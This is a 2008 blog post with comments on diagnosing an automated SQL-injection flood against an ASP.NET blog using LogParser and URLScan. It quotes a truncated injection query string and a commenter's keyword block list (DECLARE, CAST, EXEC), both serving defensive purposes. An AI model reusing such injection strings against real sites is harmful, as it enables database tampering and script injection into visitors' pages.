Dealing With Denial of Service Attacks

• Aug 22, 2008
• 19 Comments
• Print

As Scott wrote last week, using a punny title I have to admire, he and I (among many others) were both the subject of a DoS (Denial of Service) attack. Looking through my logs, it looks to actually be a DDoS (Distributed Denial of Service) attack coming from multiple IP addresses.

The attack appears to actually be an attempt at a SQL Injection attack, but for his blog, which stores its data in XML files, that is entirely pointless. For my blog, which doesn’t do any inline SQL, it’s also mostly pointless. So far, the SQL injection part of the attack has failed, but it has succeeded in pegging my CPU. Maybe that’s the actual intended goal. Only the attacker knows.

LogParser Queries

The first clue (besides my site being down) is that my log file for today is huge at 9:00 AM.

The next step is to run some queries against my logs using the fantastic LogParser tool. This post, entitled Forensic Log Parsing with Microsoft’s LogParser is a great resource for constructing queries. The focus tends to be more on investigating an actual intrusion. The queries I need are to discover what kind of DoS attack I’m experiencing. Here’s the query I’m using so far…

  logparser "SELECT c-ip, COUNT(*), STRLEN(cs-uri-query) as LENGTH, cs-uri-query 
  FROM C:\WINDOWS\system32\LogFiles\W3SVC1\ex080822.log 
  GROUP BY Length, cs-uri-query, c-ip 
  HAVING Length > 500 
  ORDER BY LENGTH DESC" -rtp:-1 > long-query.txt

Note that I’m running this for a single log file for the day. I could use a wildcard and run this for all my log files. The very last snippet, > long-query.txt, pipes the output to a text file. Here’s a snippet of one of the query strings I’m seeing:

?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST…*snip*…%20AS%20CHAR(4000));EXEC(@S);

The length of these query strings are all very long. Interestingly enough, there’s no smooth transition in length. For example, there are no query strings of length 500 – 1000.

URL Scan

I then went and installed URLScan 3.0 Beta, which Scott wrote about, and went into the configuration file (located at C:\WINDOWS\system32\inetsrv\urlscan\UrlScan.ini by default and changed the following setting near the bottom:

  MaxQueryString=2048

From its default of 2048 to another smaller value.

The other setting I changed is to allow dots in the path because I have many URLs that contain dots.

  AllowDotInPath=1

What others have said

Dale Ragan Aug 22, 2008 10:52 AM

# re: Dealing With Denial of Service Attacks

I was wondering what happened. I was trying to find some resources on ASP.NET MVC yesterday from you and site was running really slow.

Glad to see you're back up.

haacked Aug 22, 2008 11:56 AM

# re: Dealing With Denial of Service Attacks

Thanks! Me too!

Mike Brown Aug 22, 2008 1:08 PM

# re: Dealing With Denial of Service Attacks

Phil,
Did you know Julius Carry (AKA Shonuff) died of pancreatic cancer recently? blogs.bet.com/.../?cid=idnb

I do love that movie though...I'll probably watch it tonight.

Wili Aug 22, 2008 1:57 PM

# re: Dealing With Denial of Service Attacks

I have seen this show up also on our server. Does anyone know what kind of SQL injection attack it is? What will it do to SQL Server it it was allowed to run?

Sergey Aug 22, 2008 2:02 PM

# re: Dealing With Denial of Service Attacks

Congrats with successful fighting because I also noticed today some *lag* :) Now it seems to work smoothly. Btw seems this line "From its default of 2048 to another smaller value." should be one paragraph above ;)

Andrei Rinea Aug 22, 2008 3:36 PM

# DDoS basics?

I am not very educated in the (D)DoS area but I guess you could very well study the behavior of a site and learn which requests take the longest time. These might be requests that take a lot of CPU and/or RAM and/or other resources (Network I/O, Disk I/O etc.)

Then you might pound the site from multiple IPs for these certain requests and peg the CPU for a while (until your IPs get banned or sth...)

Phil, maybe you could delight us with a post regarding how (D)DoS's work and how we can efficiently protect against them.

Thanks,
Andrei.

Rod Mac Aug 22, 2008 3:54 PM

# ...same here on the hour

I am experiencing something very similar (lines and lines of declares then encoded characters) and it appears to be an append to a query string in the vain hope that a stored procedure is somehow going to accept a verbose string as a param instead of an integer. It is very weird and happens almost hourly. The site is not down though and I've thought about a redirect back to the mitigating IP address. Is someone trying to overwhelm SQL Server but to gain what? If anyone's got any light on this, would like to hear.

HeartattacK Aug 22, 2008 4:10 PM

# re: Dealing With Denial of Service Attacks

Great...err...phil....could you please change your gravatar? It's so not you...and it kind of scares me (everytime I look at it) :)

George McKee Aug 22, 2008 4:10 PM

# re: Dealing With Denial of Service Attacks

Wili asked what this SQL Injection attack will do. This looks identical to an attack I saw on one of my classic ASP sites in late April and early May. If sucessful the SQL script (which is binary encoded) injects an XSS script tag into every (n)varchar field of every table in your database. The length of the varchar fields affected must be about 50 characters or larger to be affected. Cleaning up this mess is a real PITA. Besides validating the length and data type of anything collected off the query string other things you can do to protect yourself is to limit the length of an allowable query string and disallow SQL reserved words like DECLARE or CAST or EXEC.

Edward J. Stembler Aug 22, 2008 4:10 PM

# re: Dealing With Denial of Service Attacks

I wonder if you or anyone else can offer up anything more substantial?

Are there are any automated tools or utilities out there to help identify an attack? Anything which could automatically block the attackers?

Last year when I discovered my SQL Server database was the subject of a brute force attack, I was able to block the attacks via manually creating an IP/Sec policy.

I wonder if IP/Sec could be used similarly to block a DDoS or DoS attack? I'm no expert when it comes to IP/Sec, and found it pretty tedious/confusing to setup last year.

Steve Sheldon Aug 22, 2008 9:06 PM

# re: Dealing With Denial of Service Attacks

The attack appears to actually be an attempt at a SQL Injection attack

Uhh, this stupid thing has been spreading across the Internet for about the last 4 months. It's not DDoS, it's a worm. It's really quite clever. The SQL it's inserting tells it to look at all tables and append javascript to any of the varchar columns.

URLScan is a good way of stopping it.

The other thing, apparently the worm is searching google for .asp and .aspx extensions.

mark Aug 23, 2008 1:10 AM

# re: Dealing With Denial of Service Attacks

for these types of attack, i wonder which http status code is best to return? maybe 404?

Denny Ferrassoli Aug 23, 2008 5:33 PM

# re: Dealing With Denial of Service Attacks

More info about these SQL Injection attacks can be found here: www.lockergnome.com/.../sql-injection-attacks-i...

Abdu Aug 25, 2008 9:48 AM

# re: Dealing With Denial of Service Attacks

I use Simple DNS Plus as my dns server software which has a nice feature of automatically blocking ip addresses which exceeded a number of requests per second or per minute. (One can exempt ip addresses). Effectively blocking DDOS attacks. It takes a lot less CPU there than letting IIS use URL Scan to handle these attacks.

You can probably do the same thing through your firewall if the firewall supports that.

URLScan is doing too much work to eliminate these attacks. While it can be effective, it's at the expense of CPU cycles.

Abdu

Edward J. Stembler Aug 25, 2008 3:36 PM

# re: Dealing With Denial of Service Attacks

I recently upgraded to a new router which supports SPI:

The SPI (Stateful Packet Inpection) Firewall protects your LAN against Denial of Service attacks.

Janet Sep 28, 2008 3:52 AM

# re: Dealing With Denial of Service Attacks

Recently my website got DDOS attack, and my server went down for 24 hours. I hope your Tips will help in future attacks.

Rob Reid Oct 02, 2008 4:43 PM

# re: Dealing With Denial of Service Attacks

The majority of these automated hackbots originate in China or Russia so if you wanted to eliminate 90% of attacks you could block those countries. There is a tool widely available that the hackers use to create an attack. They just enter the URLs that they want injected and press the run button. The bot then uses Google to find sites to attack and then tampers with as many URLs as possible in the hope of coming across a hole in the site. I would say this isn't really an SQL DOS attack as they tend to consume your DB servers CPU by running long winded queries involving convaluted LIKE and OR statements in the hope of searching all your data and returning no records.
The fact that your CPU was hit may just be down to the frequency and number of these automated bots that are currently doing the rounds. I was logging 2000+ attempts of this form of SQL injection up until a few months ago. I have reduced the number of logged attempts down to less than 5 day now by using ISAPI rewrite rules to redirect any requests containing the 3 most common SQL injection fingerprints about to a banned page.

You can see details of the rules and other quick fix "plasters" on an article I wrote about the matter.

blog.strictly-software.com/.../...ection-hack.html

Hussain Jan 23, 2009 5:47 AM

# I want to learn Denial of Service Attacks

I want to learn Denial Of service attacks.What can i do?

Saro May 15, 2009 3:36 AM

# re: Dealing With Denial of Service Attacks

How can i test myselft with DOS Attack? Is it possible? How can i prevent this (more detailed info)?

What do you have to say?

Title:

Name:

Email: (never displayed) (will show your gravatar)

Website:

Comment: Allowed tags: blockquote, a, strong, em, p, u, strike, super, sub, code

Please add 4 and 6 and type the answer here: